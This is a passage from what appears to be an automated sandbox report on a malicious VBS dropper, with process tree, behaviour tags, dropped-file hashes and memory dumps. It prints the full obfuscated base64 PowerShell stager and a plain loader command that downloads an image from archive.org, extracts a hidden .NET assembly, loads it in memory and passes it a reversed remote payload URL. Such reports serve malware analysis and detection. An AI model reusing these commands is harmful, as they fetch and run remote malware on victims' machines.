⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓PQ⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓Fs⚕ ⛈ ㎯ ⮎ ⍓UwB5⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓LgBD⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓bgB2⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓cgB0⚕ ⛈ ㎯ ⮎ ⍓F0⚕ ⛈ ㎯ ⮎ ⍓Og⚕ ⛈ ㎯ ⮎ ⍓6⚕ ⛈ ㎯ ⮎ ⍓EY⚕ ⛈ ㎯ ⮎ ⍓cgBv⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓QgBh⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓ZQ⚕ ⛈ ㎯ ⮎ ⍓2⚕ ⛈ ㎯ ⮎ ⍓DQ⚕ ⛈ ㎯ ⮎ ⍓UwB0⚕ ⛈ ㎯ ⮎ ⍓HI⚕ ⛈ ㎯ ⮎ ⍓aQBu⚕ ⛈ ㎯ ⮎ ⍓Gc⚕ ⛈ ㎯ ⮎ ⍓K⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓YQBz⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓Ng⚕ ⛈ ㎯ ⮎ ⍓0⚕ ⛈ ㎯ ⮎ ⍓EM⚕ ⛈ ㎯ ⮎ ⍓bwBt⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓KQ⚕ ⛈ ㎯ ⮎ ⍓7⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓QQBz⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓ZQBt⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓B5⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓PQ⚕ ⛈ ㎯ ⮎ ⍓g⚕ ⛈ ㎯ ⮎ ⍓Fs⚕ ⛈ ㎯ ⮎ ⍓UwB5⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓LgBS⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓ZgBs⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓YwB0⚕ ⛈ ㎯ ⮎ ⍓Gk⚕ ⛈ ㎯ ⮎ ⍓bwBu⚕ ⛈ ㎯ ⮎ ⍓C4⚕ ⛈ ㎯ ⮎ ⍓QQBz⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓ZQBt⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓B5⚕ ⛈ ㎯ ⮎ ⍓F0⚕ ⛈ ㎯ ⮎ ⍓Og⚕ ⛈ ㎯ ⮎ ⍓6⚕ ⛈ ㎯ ⮎ ⍓Ew⚕ ⛈ ㎯ ⮎ ⍓bwBh⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓K⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓GM⚕ ⛈ ㎯ ⮎ ⍓bwBt⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YQBu⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓QgB5⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓ZQBz⚕ ⛈ ㎯ ⮎ ⍓Ck⚕ ⛈ ㎯ ⮎ ⍓Ow⚕ ⛈ ㎯ ⮎ ⍓k⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓eQBw⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bs⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓YQBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓BB⚕ ⛈ ㎯ ⮎ ⍓HM⚕ ⛈ ㎯ ⮎ ⍓cwBl⚕ ⛈ ㎯ ⮎ ⍓G0⚕ ⛈ ㎯ ⮎ ⍓YgBs⚕ ⛈ ㎯ ⮎ ⍓Hk⚕ ⛈ ㎯ ⮎ ⍓LgBH⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓BU⚕ ⛈ ㎯ ⮎ ⍓Hk⚕ ⛈ ㎯ ⮎ ⍓c⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓Cg⚕ ⛈ ㎯ ⮎ ⍓JwBk⚕ ⛈ ㎯ ⮎ ⍓G4⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓Bp⚕ ⛈ ㎯ ⮎ ⍓GI⚕ ⛈ ㎯ ⮎ ⍓LgBJ⚕ ⛈ ㎯ ⮎ ⍓E8⚕ ⛈ ㎯ ⮎ ⍓LgBI⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓bQBl⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓KQ⚕ ⛈ ㎯ ⮎ ⍓7⚕ ⛈ ㎯ ⮎ ⍓CQ⚕ ⛈ ㎯ ⮎ ⍓bQBl⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓a⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓9⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓B0⚕ ⛈ ㎯ ⮎ ⍓Hk⚕ ⛈ ㎯ ⮎ ⍓c⚕ ⛈ ㎯ ⮎ ⍓Bl⚕ ⛈ ㎯ ⮎ ⍓C4⚕ ⛈ ㎯ ⮎ ⍓RwBl⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓TQBl⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓a⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓GQ⚕ ⛈ ㎯ ⮎ ⍓K⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓FY⚕ ⛈ ㎯ ⮎ ⍓QQBJ⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓KQ⚕ ⛈ ㎯ ⮎ ⍓u⚕ ⛈ ㎯ ⮎ ⍓Ek⚕ ⛈ ㎯ ⮎ ⍓bgB2⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓awBl⚕ ⛈ ㎯ ⮎ ⍓Cg⚕ ⛈ ㎯ ⮎ ⍓J⚕ ⛈ ㎯ ⮎ ⍓Bu⚕ ⛈ ㎯ ⮎ ⍓HU⚕ ⛈ ㎯ ⮎ ⍓b⚕ ⛈ ㎯ ⮎ ⍓Bs⚕ ⛈ ㎯ ⮎ ⍓Cw⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓Bb⚕ ⛈ ㎯ ⮎ ⍓G8⚕ ⛈ ㎯ ⮎ ⍓YgBq⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓YwB0⚕ ⛈ ㎯ ⮎ ⍓Fs⚕ ⛈ ㎯ ⮎ ⍓XQBd⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓K⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓e⚕ ⛈ ㎯ ⮎ ⍓B0⚕ ⛈ ㎯ ⮎ ⍓C4⚕ ⛈ ㎯ ⮎ ⍓T⚕ ⛈ ㎯ ⮎ ⍓BM⚕ ⛈ ㎯ ⮎ ⍓E8⚕ ⛈ ㎯ ⮎ ⍓TgBS⚕ ⛈ ㎯ ⮎ ⍓C8⚕ ⛈ ㎯ ⮎ ⍓OQ⚕ ⛈ ㎯ ⮎ ⍓x⚕ ⛈ ㎯ ⮎ ⍓DE⚕ ⛈ ㎯ ⮎ ⍓Lw⚕ ⛈ ㎯ ⮎ ⍓w⚕ ⛈ ㎯ ⮎ ⍓DE⚕ ⛈ ㎯ ⮎ ⍓Lg⚕ ⛈ ㎯ ⮎ ⍓0⚕ ⛈ ㎯ ⮎ ⍓C4⚕ ⛈ ㎯ ⮎ ⍓Mw⚕ ⛈ ㎯ ⮎ ⍓3⚕ ⛈ ㎯ ⮎ ⍓DE⚕ ⛈ ㎯ ⮎ ⍓Lg⚕ ⛈ ㎯ ⮎ ⍓3⚕ ⛈ ㎯ ⮎ ⍓D⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓MQ⚕ ⛈ ㎯ ⮎ ⍓v⚕ ⛈ ㎯ ⮎ ⍓C8⚕ ⛈ ㎯ ⮎ ⍓OgBw⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓d⚕ ⛈ ㎯ ⮎ ⍓Bo⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓s⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓JwBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓cwBh⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓aQB2⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓s⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓JwBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓cwBh⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓aQB2⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓I⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓s⚕ ⛈ ㎯ ⮎ ⍓C⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓JwBk⚕ ⛈ ㎯ ⮎ ⍓GU⚕ ⛈ ㎯ ⮎ ⍓cwBh⚕ ⛈ ㎯ ⮎ ⍓HQ⚕ ⛈ ㎯ ⮎ ⍓aQB2⚕ ⛈ ㎯ ⮎ ⍓GE⚕ ⛈ ㎯ ⮎ ⍓Z⚕ ⛈ ㎯ ⮎ ⍓Bv⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓L⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓FI⚕ ⛈ ㎯ ⮎ ⍓ZQBn⚕ ⛈ ㎯ ⮎ ⍓EE⚕ ⛈ ㎯ ⮎ ⍓cwBt⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓L⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓n⚕ ⛈ ㎯ ⮎ ⍓Cc⚕ ⛈ ㎯ ⮎ ⍓KQ⚕ ⛈ ㎯ ⮎ ⍓p⚕ ⛈ ㎯ ⮎ ⍓⚕ ⛈ ㎯ ⮎ ⍓==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⚕ ⛈ ㎯ ⮎ ⍓','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.LLONR/911/01.4.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    b56e6993dd117ca471528c4e14427c8f

    SHA1

    5db98af17a33f065478a08f5e7201b3fac57259d

    SHA256

    7f2123b45e5c59a16a3509680d1721fe5bf2a60812e4b369ac71b1c480d01020

    SHA512

    ed872ec0d233a0facad438bf389187f32a9685226dcdb2fb94e8a5dac7db8ba666ecb453a4360d85fb45feb411f2a0b8fea86b9f679eabcc69466b950ca29b00

    Download Submit

  • C:\Users\Admin\AppData\Roaming\cutebabygirlwantmetosweetnam.vBS
    Filesize

    190KB

    MD5

    44ae01e9018c47c3ed86735fbc3111df

    SHA1

    4ffcf8bcaea8c9d4b675c33e81a748589267686e

    SHA256

    5e748dbcb37f5de5f010fb7378fe7f973db532d3248c1c0f13d034865866b0c5

    SHA512

    8bce36f2b816a94a5131a2964432c40ade7bdc5656735dd0697aacf98a546e59a3c6b0124fbb0f23397af7bbd26519fceadd447089b1a422c7eed1d972d3f9cf

    Download Submit

  • memory/876-20-0x00000000056D0000-0x0000000005728000-memory.dmp

    Filesize

    352KB

    Download

  • memory/876-21-0x0000000002DC0000-0x0000000002E0F000-memory.dmp

    Filesize

    316KB

    Download

  • memory/2892-0-0x000000002F6B1000-0x000000002F6B2000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2892-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2892-2-0x00000000712CD000-0x00000000712D8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2892-4-0x00000000712CD000-0x00000000712D8000-memory.dmp

    Filesize

    44KB

    Download